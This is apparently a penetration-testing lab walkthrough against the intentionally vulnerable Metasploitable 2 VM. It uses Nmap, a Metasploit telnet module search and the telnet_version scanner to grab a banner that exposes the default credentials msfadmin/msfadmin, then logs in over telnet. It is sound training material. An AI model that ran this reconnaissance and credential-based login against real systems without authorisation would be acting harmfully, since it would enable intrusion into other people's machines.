The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
Most of the information on the Internet talks of using a password cracking tool for this Telnet service; however, there is another way using a Metasploit scanner:
msf > search telnet
[!] Database not connected or cache not built, using slow searchMatching Modules
================Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/http/dlink_dir_300_600_exec_noauth 2013-02-04 normal D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof 2010-12-21 normal Microsoft IIS FTP Server Encoded Response Overflow Trigger
auxiliary/scanner/telnet/lantronix_telnet_password normal Lantronix Telnet Password Recovery
auxiliary/scanner/telnet/lantronix_telnet_version normal Lantronix Telnet Service Banner Detection
auxiliary/scanner/telnet/telnet_encrypt_overflow normal Telnet Service Encyption Key ID Overflow Detection
auxiliary/scanner/telnet/telnet_login normal Telnet Login Check Scanner
auxiliary/scanner/telnet/telnet_ruggedcom normal RuggedCom Telnet Password Generator
auxiliary/scanner/telnet/telnet_version normal Telnet Service Banner Detection
auxiliary/server/capture/telnet normal Authentication Capture: Telnet
exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
exploit/freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great FreeBSD Telnet Service Encryption Key ID Buffer Overflow
exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (Linux)
exploit/linux/http/dlink_diagnostic_exec_noauth 2013-03-05 excellent D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
exploit/linux/http/dlink_dir300_exec_telnet 2013-04-22 excellent D-Link Devices Unauthenticated Remote Command Execution
exploit/linux/http/dlink_upnp_exec_noauth_telnetd 2013-07-05 excellent D-Link Devices UPnP SOAP Telnetd Command Execution
exploit/linux/telnet/telnet_encrypt_keyid 2011-12-23 great Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
exploit/solaris/telnet/fuser 2007-02-12 excellent Sun Solaris Telnet Remote Authentication Bypass Vulnerability
exploit/solaris/telnet/ttyprompt 2002-01-18 excellent Solaris in.telnetd TTYPROMPT Buffer Overflow
exploit/unix/webapp/dogfood_spell_exec 2009-03-03 excellent Dogfood CRM spell.php Remote Command Execution
exploit/windows/proxy/ccproxy_telnet_ping 2004-11-11 average CCProxy <= v6.2 Telnet Proxy Ping Overflow
exploit/windows/telnet/gamsoft_telsrv_username 2000-07-17 average GAMSoft TelSrv 1.5 Username Buffer Overflow
exploit/windows/telnet/goodtech_telnet 2005-03-15 average GoodTech Telnet Server <= 5.0.6 Buffer Overflow
payload/cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
payload/cmd/unix/reverse_bash_telnet_ssl normal Unix Command Shell, Reverse TCP SSL (telnet)
payload/cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)
post/windows/gather/credentials/mremote normal Windows Gather mRemote Saved Password Extractionmsf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show optionsModule options (auxiliary/scanner/telnet/telnet_version):
Name Current Setting Required Description
—- ————— ——– ———–
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
RPORT 23 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the Telnet probe
USERNAME no The username to authenticate asmsf auxiliary(telnet_version) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(telnet_version) > set RPORT 23
RPORT => 23
msf auxiliary(telnet_version) > run[*] 192.168.1.103:23 TELNET _ _ _ _ _ _ ____ \x0a _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |\x0a| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >
If we look carefully at the Telnet Banner we can see Login with msfadmin/msfadmin and so armed with the username and password we can connect via the attacking Terminal:
# telnet 192.168.1.103
Trying 192.168.1.103…
Connected to 192.168.1.103.
Escape character is ‘^]’.
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password:
Last login: Tue Nov 5 13:12:09 EST 2013 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
To run a command as administrator (user “root”), use “sudo <command>”.
See “man sudo_root” for details.msfadmin@metasploitable:~$